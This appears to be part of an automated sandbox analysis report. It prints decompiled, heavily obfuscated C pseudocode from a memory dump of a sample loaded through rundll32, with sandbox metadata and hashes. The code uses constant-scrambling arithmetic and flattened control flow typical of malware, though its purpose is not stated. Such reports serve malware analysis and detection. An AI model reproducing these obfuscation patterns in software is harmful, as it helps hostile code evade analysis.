                                                                                                                      				_v92 = _v92 ^ 0x00df4f59;
                                                                                                                      				_v160 = 0x746cf1;
                                                                                                                      				_v160 = _v160 ^ 0x2b133776;
                                                                                                                      				_v160 = _v160 + 0xffff944c;
                                                                                                                      				_v160 = _v160 / _t371;
                                                                                                                      				_v160 = _v160 ^ 0x0189d9d1;
                                                                                                                      				_v144 = 0x9ec305;
                                                                                                                      				_v144 = _v144 + 0xffffd43e;
                                                                                                                      				_v144 = _v144 << 3;
                                                                                                                      				_v144 = _v144 ^ 0x04f670ec;
                                                                                                                      				_v148 = 0x64c482;
                                                                                                                      				_v148 = _v148 + 0x3823;
                                                                                                                      				_t372 = 0x6f;
                                                                                                                      				_v148 = _v148 / _t372;
                                                                                                                      				_v148 = _v148 ^ 0x000f1a49;
                                                                                                                      				_v68 = 0x131d36;
                                                                                                                      				_v68 = _v68 ^ 0xb06b804d;
                                                                                                                      				_v68 = _v68 ^ 0xb072f73d;
                                                                                                                      				_v124 = 0xcf68d3;
                                                                                                                      				_v124 = _v124 + 0x418a;
                                                                                                                      				_v124 = _v124 + 0xdb2c;
                                                                                                                      				_v124 = _v124 ^ 0x00d4c88c;
                                                                                                                      				_v140 = 0x60ea9a;
                                                                                                                      				_v140 = _v140 >> 0xa;
                                                                                                                      				_v140 = _v140 >> 4;
                                                                                                                      				_v140 = _v140 ^ 0x0002f747;
                                                                                                                      				_v116 = 0xa906b8;
                                                                                                                      				_t373 = 0x61;
                                                                                                                      				_v116 = _v116 * 0x66;
                                                                                                                      				_v116 = _v116 / _t373;
                                                                                                                      				_v116 = _v116 ^ 0x00b9e105;
                                                                                                                      				_v152 = 0x1b4b23;
                                                                                                                      				_v152 = _v152 + 0x6529;
                                                                                                                      				_v152 = _v152 << 7;
                                                                                                                      				_v152 = _v152 ^ 0x0dd37b6c;
                                                                                                                      				_v56 = 0xb64e13;
                                                                                                                      				_t374 = 0x36;
                                                                                                                      				_v56 = _v56 / _t374;
                                                                                                                      				_v56 = _v56 ^ 0x000ccadc;
                                                                                                                      				_v180 = 0xa61587;
                                                                                                                      				_v180 = _v180 ^ 0x79fc160a;
                                                                                                                      				_t375 = 0x7a;
                                                                                                                      				_v180 = _v180 * 0x16;
                                                                                                                      				_v180 = _v180 ^ 0x4f1bf23d;
                                                                                                                      				_v180 = _v180 ^ 0x22abe71e;
                                                                                                                      				_v120 = 0x473252;
                                                                                                                      				_v120 = _v120 + 0xffff4692;
                                                                                                                      				_v120 = _v120 / _t375;
                                                                                                                      				_v120 = _v120 ^ 0x000f54d2;
                                                                                                                      				_v60 = 0x2fd158;
                                                                                                                      				_v60 = _v60 + 0x5b64;
                                                                                                                      				_v60 = _v60 ^ 0x0034a0e9;
                                                                                                                      				_v84 = 0xc57bbf;
                                                                                                                      				_v84 = _v84 ^ 0x7beef004;
                                                                                                                      				_v84 = _v84 ^ 0x7b204221;
                                                                                                                      				_v52 = 0xc39e48;
                                                                                                                      				_t376 = 0x4d;
                                                                                                                      				_v52 = _v52 / _t376;
                                                                                                                      				_v52 = _v52 ^ 0x0006d078;
                                                                                                                      				_v108 = 0x102acf;
                                                                                                                      				_v108 = _v108 >> 0xa;
                                                                                                                      				_v108 = _v108 ^ 0x000242b6;
                                                                                                                      				_v80 = 0xaaee53;
                                                                                                                      				_t377 = 0x79;
                                                                                                                      				_v80 = _v80 * 0x74;
                                                                                                                      				_v80 = _v80 ^ 0x4d7dabdb;
                                                                                                                      				_v88 = 0x1ad2b9;
                                                                                                                      				_v88 = _v88 | 0x310da8db;
                                                                                                                      				_v88 = _v88 ^ 0x311cb062;
                                                                                                                      				_v136 = 0x81cc6c;
                                                                                                                      				_v136 = _v136 >> 0xc;
                                                                                                                      				_v136 = _v136 << 0xd;
                                                                                                                      				_v136 = _v136 ^ 0x0107e876;
                                                                                                                      				_v96 = 0x2bc0c4;
                                                                                                                      				_v96 = _v96 * 0x4c;
                                                                                                                      				_v96 = _v96 ^ 0x0cfd01fe;
                                                                                                                      				_v176 = 0x403c4e;
                                                                                                                      				_t174 =  &_v176; // 0x403c4e
                                                                                                                      				_v176 =  *_t174 / _t377;
                                                                                                                      				_t180 =  &_v176; // 0x403c4e
                                                                                                                      				_v176 =  *_t180 * 0x5e;
                                                                                                                      				_v176 = _v176 << 5;
                                                                                                                      				_v176 = _v176 ^ 0x0632c8a8;
                                                                                                                      				_v44 = 0x1618ce;
                                                                                                                      				_v44 = _v44 + 0xffff8813;
                                                                                                                      				_v44 = _v44 ^ 0x00124c47;
                                                                                                                      				_v76 = 0x551030;
                                                                                                                      				_v76 = _v76 + 0x65ef;
                                                                                                                      				_v76 = _v76 ^ 0x005f521e;
                                                                                                                      				_v132 = 0xb7ed4f;
                                                                                                                      				_v132 = _v132 << 0xb;
                                                                                                                      				_v132 = _v132 >> 0xa;
                                                                                                                      				_v132 = _v132 ^ 0x002e4b92;
                                                                                                                      				_v64 = 0xfb13c3;
                                                                                                                      				_v64 = _v64 * 0x16;
                                                                                                                      				_v64 = _v64 ^ 0x159ca6b2;
                                                                                                                      				_v168 = 0x8e8363;
                                                                                                                      				_v168 = _v168 ^ 0x49fc5726;
                                                                                                                      				_v168 = _v168 >> 8;
                                                                                                                      				_v168 = _v168 >> 4;
                                                                                                                      				_v168 = _v168 ^ 0x0002bf0f;
                                                                                                                      				_v72 = 0x8b4c84;
                                                                                                                      				_t378 = 0x68;
                                                                                                                      				_v72 = _v72 / _t378;
                                                                                                                      				_v72 = _v72 ^ 0x00015b8a;
                                                                                                                      				_v128 = 0x282e65;
                                                                                                                      				_v128 = _v128 >> 3;
                                                                                                                      				_v128 = _v128 << 9;
                                                                                                                      				_v128 = _v128 ^ 0x0a079d52;
                                                                                                                      				_v156 = 0xadd370;
                                                                                                                      				_t379 = 0x3e;
                                                                                                                      				_v156 = _v156 / _t379;
                                                                                                                      				_v156 = _v156 << 0xf;
                                                                                                                      				_v156 = _v156 + 0xffff35e7;
                                                                                                                      				_v156 = _v156 ^ 0x66d9d095;
                                                                                                                      				_v164 = 0xb0b7ce;
                                                                                                                      				_v164 = _v164 + 0xffffdc7a;
                                                                                                                      				_v164 = _v164 * 0x61;
                                                                                                                      				_v164 = _v164 + 0xffff24b0;
                                                                                                                      				_v164 = _v164 ^ 0x42ea90cd;
                                                                                                                      				_v172 = 0xee7b33;
                                                                                                                      				_v172 = _v172 | 0x904c1683;
                                                                                                                      				_v172 = _v172 * 0x2c;
                                                                                                                      				_v172 = _v172 >> 4;
                                                                                                                      				_v172 = _v172 ^ 0x0e8d9d52;
                                                                                                                      				_v48 = 0xdaf5e6;
                                                                                                                      				_v48 = _v48 ^ 0xf4ca4d64;
                                                                                                                      				_v48 = _v48 ^ 0xf41f1779;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t431 = _t382 - 0x9c1484f;
                                                                                                                      						if(_t431 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t431 == 0) {
                                                                                                                      							E00683DBC( &_v40, _t424, _v160, _v144, _v148);
                                                                                                                      							_t428 = _t428 + 0xc;
                                                                                                                      							_t382 = 0x9229f3e;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t382 == 0x3e8dc94) {
                                                                                                                      								_t382 = 0xb0d10f2;
                                                                                                                      								 *_t424 =  *_t424 & 0x00000000;
                                                                                                                      								_t424[1] = _v104;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t382 == 0x73dcb22) {
                                                                                                                      									E00690DAF(_v176,  &_v40, _v44,  *((intOrPtr*)(_t425 + 0x44)), _v76, _v132);
                                                                                                                      									_t428 = _t428 + 0x10;
                                                                                                                      									_t382 = 0xca0d778;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t382 == 0x8cfc35c) {
                                                                                                                      										E00690DAF(_v60,  &_v40, _v84,  *((intOrPtr*)(_t425 + 0x3c)), _v52, _v108);
                                                                                                                      										_t428 = _t428 + 0x10;
                                                                                                                      										_t382 = 0xfa9ed0f;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t382 == 0x9229f3e) {
                                                                                                                      											E006A0E3A( &_v40, _v68, __eflags, _v124, _v140, _v116, _t425 + 0x1c);
                                                                                                                      											_t428 = _t428 + 0x10;
                                                                                                                      											_t382 = 0xa7e786e;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t382 != 0x95701e8) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												_push(_t382);
                                                                                                                      												_push(_t382);
                                                                                                                      												_t369 = E00687FF2(_t424[1]);
                                                                                                                      												 *_t424 = _t369;
                                                                                                                      												if(_t369 != 0) {
                                                                                                                      													_t382 = 0x9c1484f;
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L27:
                                                                                                                      						__eflags =  *_t424;
                                                                                                                      						_t322 =  *_t424 != 0;
                                                                                                                      						__eflags = _t322;
                                                                                                                      						return 0 | _t322;
                                                                                                                      					}
                                                                                                                      					__eflags = _t382 - 0xa7e786e;
                                                                                                                      					if(_t382 == 0xa7e786e) {
                                                                                                                      						E00690DAF(_v152,  &_v40, _v56,  *((intOrPtr*)(_t425 + 0x48)), _v180, _v120);
                                                                                                                      						_t428 = _t428 + 0x10;
                                                                                                                      						_t382 = 0x8cfc35c;
                                                                                                                      						goto L24;
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t382 - 0xa84b454;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							E006A0E3A( &_v40, _v156, __eflags, _v164, _v172, _v48, _t425 + 0x14);
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t382 - 0xb0d10f2;
                                                                                                                      							if(_t382 == 0xb0d10f2) {
                                                                                                                      								_t424[1] = E0069C631(_t425);
                                                                                                                      								_t382 = 0x95701e8;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t382 - 0xca0d778;
                                                                                                                      								if(_t382 == 0xca0d778) {
                                                                                                                      									E00690DAF(_v64,  &_v40, _v168,  *_t425, _v72, _v128);
                                                                                                                      									_t428 = _t428 + 0x10;
                                                                                                                      									_t382 = 0xa84b454;
                                                                                                                      									goto L1;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t382 - 0xfa9ed0f;
                                                                                                                      									if(_t382 != 0xfa9ed0f) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										E00690DAF(_v80,  &_v40, _v88,  *((intOrPtr*)(_t425 + 0x30)), _v136, _v96);
                                                                                                                      										_t428 = _t428 + 0x10;
                                                                                                                      										_t382 = 0x73dcb22;
                                                                                                                      										goto L1;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L27;
                                                                                                                      					L24:
                                                                                                                      					__eflags = _t382 - 0xd4a25d5;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L27;
                                                                                                                      			}
























































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                      • API String ID: 0-245365489
                                                                                                                      • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                      • Instruction ID: 49eea34b549260cbc0bd602b65c028c91aa012bed437b265abffc52be2b37ead
                                                                                                                      • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                      • Instruction Fuzzy Hash: B5F142715083819FD7A8DF61C48A65BFBE2FFD4348F108A1DF29A86261D7B18958CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00689714(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				void* _t251;
                                                                                                                      				intOrPtr _t252;
                                                                                                                      				intOrPtr _t253;
                                                                                                                      				void* _t257;
                                                                                                                      				signed int _t259;
                                                                                                                      				signed int _t260;
                                                                                                                      				signed int _t261;
                                                                                                                      				signed int _t262;
                                                                                                                      				signed int _t263;
                                                                                                                      				signed int _t264;
                                                                                                                      				void* _t292;
                                                                                                                      				void* _t293;
                                                                                                                      				signed int* _t296;
                                                                                                                      				signed int* _t297;
                                                                                                                      
                                                                                                                      				_t296 =  &_v104;
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0xc5b764;
                                                                                                                      				_v8 = 0xb6da07;
                                                                                                                      				_v100 = 0x6b81aa;
                                                                                                                      				_v100 = _v100 ^ 0x5133456b;
                                                                                                                      				_t8 =  &_v100; // 0x5133456b
                                                                                                                      				_v100 =  *_t8 * 0x6e;
                                                                                                                      				_t292 = __edx;
                                                                                                                      				_v100 = _v100 << 0xa;
                                                                                                                      				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                      				_t257 = __ecx;
                                                                                                                      				_v20 = 0x2c208b;
                                                                                                                      				_t293 = 0x52ffaa2;
                                                                                                                      				_v20 = _v20 + 0xffff37e6;
                                                                                                                      				_v20 = _v20 ^ 0x00212911;
                                                                                                                      				_v60 = 0xb21c01;
                                                                                                                      				_v60 = _v60 ^ 0x31980a41;
                                                                                                                      				_v60 = _v60 + 0xffff033c;
                                                                                                                      				_v60 = _v60 ^ 0x31255444;
                                                                                                                      				_v64 = 0x612501;
                                                                                                                      				_v64 = _v64 << 2;
                                                                                                                      				_v64 = _v64 + 0xf44;
                                                                                                                      				_v64 = _v64 ^ 0x018d6347;
                                                                                                                      				_v52 = 0x111460;
                                                                                                                      				_v52 = _v52 + 0xffffc2ff;
                                                                                                                      				_v52 = _v52 | 0x8d441097;
                                                                                                                      				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                      				_v56 = 0xb6e38a;
                                                                                                                      				_t259 = 0x67;
                                                                                                                      				_v56 = _v56 / _t259;
                                                                                                                      				_t260 = 0x41;
                                                                                                                      				_v56 = _v56 * 0x32;
                                                                                                                      				_v56 = _v56 ^ 0x00536033;
                                                                                                                      				_v96 = 0xaa1e09;
                                                                                                                      				_v96 = _v96 / _t260;
                                                                                                                      				_t261 = 0x73;
                                                                                                                      				_v96 = _v96 * 0xd;
                                                                                                                      				_v96 = _v96 / _t261;
                                                                                                                      				_v96 = _v96 ^ 0x00047537;
                                                                                                                      				_v88 = 0xebbfc;
                                                                                                                      				_v88 = _v88 << 7;
                                                                                                                      				_v88 = _v88 | 0x3053ba58;
                                                                                                                      				_t262 = 0x7f;
                                                                                                                      				_v88 = _v88 / _t262;
                                                                                                                      				_v88 = _v88 ^ 0x006c206b;
                                                                                                                      				_v44 = 0xece271;
                                                                                                                      				_v44 = _v44 + 0xffff86ef;
                                                                                                                      				_v44 = _v44 + 0x6a70;
                                                                                                                      				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                      				_v48 = 0xd70038;
                                                                                                                      				_v48 = _v48 | 0x378b661e;
                                                                                                                      				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                      				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                      				_v92 = 0x86f3ef;
                                                                                                                      				_v92 = _v92 << 0xd;
                                                                                                                      				_v92 = _v92 >> 0xd;
                                                                                                                      				_v92 = _v92 + 0x4513;
                                                                                                                      				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                      				_v80 = 0x7a204;
                                                                                                                      				_v80 = _v80 + 0xffffa60a;
                                                                                                                      				_v80 = _v80 | 0x4d150135;
                                                                                                                      				_v80 = _v80 + 0xffff9d32;
                                                                                                                      				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                      				_v40 = 0x124198;
                                                                                                                      				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                      				_t263 = 0x78;
                                                                                                                      				_v40 = _v40 * 0x18;
                                                                                                                      				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                      				_v84 = 0xcaa24a;
                                                                                                                      				_v84 = _v84 * 0x42;
                                                                                                                      				_v84 = _v84 ^ 0x45be5790;
                                                                                                                      				_v84 = _v84 + 0xffff0d2f;
                                                                                                                      				_v84 = _v84 ^ 0x718e360f;
                                                                                                                      				_v24 = 0x4d7038;
                                                                                                                      				_v24 = _v24 | 0x28b75b7a;
                                                                                                                      				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                      				_v28 = 0x844762;
                                                                                                                      				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                      				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                      				_v32 = 0xfc2930;
                                                                                                                      				_v32 = _v32 / _t263;
                                                                                                                      				_v32 = _v32 ^ 0x00028374;
                                                                                                                      				_v104 = 0xce3f74;
                                                                                                                      				_v104 = _v104 + 0x3224;
                                                                                                                      				_v104 = _v104 + 0x85ca;
                                                                                                                      				_t264 = 0xe;
                                                                                                                      				_v104 = _v104 / _t264;
                                                                                                                      				_v104 = _v104 ^ 0x0007887d;
                                                                                                                      				_v68 = 0x11fdc1;
                                                                                                                      				_v68 = _v68 | 0x0fd109af;
                                                                                                                      				_t265 = 0x52;
                                                                                                                      				_v68 = _v68 / _t265;
                                                                                                                      				_v68 = _v68 ^ 0x00367c27;
                                                                                                                      				_v72 = 0xa9a7e;
                                                                                                                      				_v72 = _v72 * 0x16;
                                                                                                                      				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                      				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                      				_v76 = 0xb2d6c0;
                                                                                                                      				_v76 = _v76 + 0xffff5dcd;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 >> 4;
                                                                                                                      				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                      				_v16 = 0x41627;
                                                                                                                      				_v16 = _v16 + 0xccf7;
                                                                                                                      				_v16 = _v16 ^ 0x00091dff;
                                                                                                                      				_v36 = 0xd94625;
                                                                                                                      				_v36 = _v36 + 0x741;
                                                                                                                      				_v36 = _v36 << 0x10;
                                                                                                                      				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t251 = 0xc3f018b;
                                                                                                                      					do {
                                                                                                                      						L2:
                                                                                                                      						while(_t293 != 0x52ffaa2) {
                                                                                                                      							if(_t293 == 0x865547f) {
                                                                                                                      								_t265 = _v80;
                                                                                                                      								_t252 = E0068CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                      								_t296 =  &(_t296[2]);
                                                                                                                      								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                      								__eflags = _t252;
                                                                                                                      								_t251 = 0xc3f018b;
                                                                                                                      								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							if(_t293 == 0xb133873) {
                                                                                                                      								_push(_v64);
                                                                                                                      								_t253 = E0069C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                      								_t297 =  &(_t296[4]);
                                                                                                                      								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                      								__eflags = _t253;
                                                                                                                      								if(_t253 != 0) {
                                                                                                                      									E00687B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                      									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                      									_push(_v92);
                                                                                                                      									_push(_v48);
                                                                                                                      									_t265 = _v88;
                                                                                                                      									E00687C37(_v88, _v44);
                                                                                                                      									_t296 =  &(_t297[6]);
                                                                                                                      									_t293 = 0x865547f;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t293 == 0xb7a2405) {
                                                                                                                      									return E00699E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                      								}
                                                                                                                      								if(_t293 != _t251) {
                                                                                                                      									goto L13;
                                                                                                                      								} else {
                                                                                                                      									_t253 = E006846BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0068219A, _v72);
                                                                                                                      									_t296 =  &(_t296[0xa]);
                                                                                                                      									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                      									if(_t253 == 0) {
                                                                                                                      										_t293 = 0xb7a2405;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t251 = 0xc3f018b;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							return _t253;
                                                                                                                      						}
                                                                                                                      						_t293 = 0xb133873;
                                                                                                                      						L13:
                                                                                                                      						__eflags = _t293 - 0x1aeb2e;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t251;
                                                                                                                      				}
                                                                                                                      			}












































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                      • API String ID: 0-1622084174
                                                                                                                      • Opcode ID: 06b1d89eb1fb5c02428d23ad844c433b2f798627b3f772edd869af1620a57b8d
                                                                                                                      • Instruction ID: 6087d8c41e1bc7995b9ff3791a3d3573ee176cefd44904a1beac503852301865
                                                                                                                      • Opcode Fuzzy Hash: 06b1d89eb1fb5c02428d23ad844c433b2f798627b3f772edd869af1620a57b8d
                                                                                                                      • Instruction Fuzzy Hash: A5B140729083419FC398DF25C58A40BFBF2BBC4758F008A1DF59A96220D3B5D95ACF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006864E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				char _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				intOrPtr _v268;
                                                                                                                      				char _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				void* _t311;
                                                                                                                      				void* _t332;
                                                                                                                      				intOrPtr _t335;
                                                                                                                      				intOrPtr _t338;
                                                                                                                      				intOrPtr _t343;
                                                                                                                      				void* _t345;
                                                                                                                      				void* _t347;
                                                                                                                      				void* _t349;
                                                                                                                      				void* _t352;
                                                                                                                      				intOrPtr _t359;
                                                                                                                      				intOrPtr _t361;
                                                                                                                      				intOrPtr* _t362;
                                                                                                                      				intOrPtr _t364;
                                                                                                                      				signed int _t367;
                                                                                                                      				intOrPtr _t386;
                                                                                                                      				intOrPtr _t387;
                                                                                                                      				intOrPtr _t413;
                                                                                                                      				signed int _t414;
                                                                                                                      				signed int _t415;
                                                                                                                      				signed int _t416;
                                                                                                                      				signed int _t417;
                                                                                                                      				signed int _t418;
                                                                                                                      				signed int _t419;
                                                                                                                      				signed int _t420;
                                                                                                                      				signed int _t421;
                                                                                                                      				signed int _t422;
                                                                                                                      				void* _t423;
                                                                                                                      				signed int* _t425;
                                                                                                                      				void* _t427;
                                                                                                                      
                                                                                                                      				_push(_a24);
                                                                                                                      				_t423 = __edx;
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t311);
                                                                                                                      				_v264 = _v264 & 0x00000000;
                                                                                                                      				_t425 =  &(( &_v412)[8]);
                                                                                                                      				_v268 = 0x38f10b;
                                                                                                                      				_v376 = 0x1d6e4;
                                                                                                                      				_t364 = 0;
                                                                                                                      				_v376 = _v376 + 0x2cf5;
                                                                                                                      				_t367 = 0x349a1a2;
                                                                                                                      				_v376 = _v376 + 0xffffbc4f;
                                                                                                                      				_v376 = _v376 + 0xc828;
                                                                                                                      				_v376 = _v376 ^ 0x000c4abe;
                                                                                                                      				_v344 = 0xf0b614;
                                                                                                                      				_t415 = 0x49;
                                                                                                                      				_v344 = _v344 / _t415;
                                                                                                                      				_v344 = _v344 ^ 0x0006b22b;
                                                                                                                      				_v296 = 0xc48c2;
                                                                                                                      				_v296 = _v296 >> 0xa;
                                                                                                                      				_v296 = _v296 ^ 0x0001ad51;
                                                                                                                      				_v384 = 0x7feda9;
                                                                                                                      				_t416 = 0x39;
                                                                                                                      				_v384 = _v384 * 0x1a;
                                                                                                                      				_v384 = _v384 ^ 0x3da8c069;
                                                                                                                      				_v384 = _v384 + 0xffff691b;
                                                                                                                      				_v384 = _v384 ^ 0x315a0b75;
                                                                                                                      				_v400 = 0x77d138;
                                                                                                                      				_v400 = _v400 + 0xffff5a87;
                                                                                                                      				_v400 = _v400 << 3;
                                                                                                                      				_v400 = _v400 + 0xffff9ef2;
                                                                                                                      				_v400 = _v400 ^ 0x03bdd381;
                                                                                                                      				_v312 = 0x267902;
                                                                                                                      				_v312 = _v312 | 0xf93e454e;
                                                                                                                      				_v312 = _v312 ^ 0xf93fe769;
                                                                                                                      				_v308 = 0x6d5338;
                                                                                                                      				_v308 = _v308 ^ 0x3f4c4be5;
                                                                                                                      				_v308 = _v308 ^ 0x3f211e75;
                                                                                                                      				_v328 = 0x5e1da9;
                                                                                                                      				_v328 = _v328 / _t416;
                                                                                                                      				_v328 = _v328 ^ 0x000cc368;
                                                                                                                      				_v364 = 0xd2dbf2;
                                                                                                                      				_v364 = _v364 + 0xffffefaa;
                                                                                                                      				_v364 = _v364 + 0xd543;
                                                                                                                      				_v364 = _v364 ^ 0x00d6d9fb;
                                                                                                                      				_v304 = 0x235f1e;
                                                                                                                      				_t417 = 0x2e;
                                                                                                                      				_v304 = _v304 / _t417;
                                                                                                                      				_v304 = _v304 ^ 0x000b3ded;
                                                                                                                      				_v320 = 0xc8231f;
                                                                                                                      				_v320 = _v320 << 0xc;
                                                                                                                      				_v320 = _v320 ^ 0x8237c00a;
                                                                                                                      				_v356 = 0xee2c9b;
                                                                                                                      				_v356 = _v356 ^ 0xa0da06c4;
                                                                                                                      				_v356 = _v356 ^ 0xf246f640;
                                                                                                                      				_v356 = _v356 ^ 0x52703357;
                                                                                                                      				_v412 = 0xc100a3;
                                                                                                                      				_v412 = _v412 ^ 0xb8e7c080;
                                                                                                                      				_v412 = _v412 ^ 0xb6721a67;
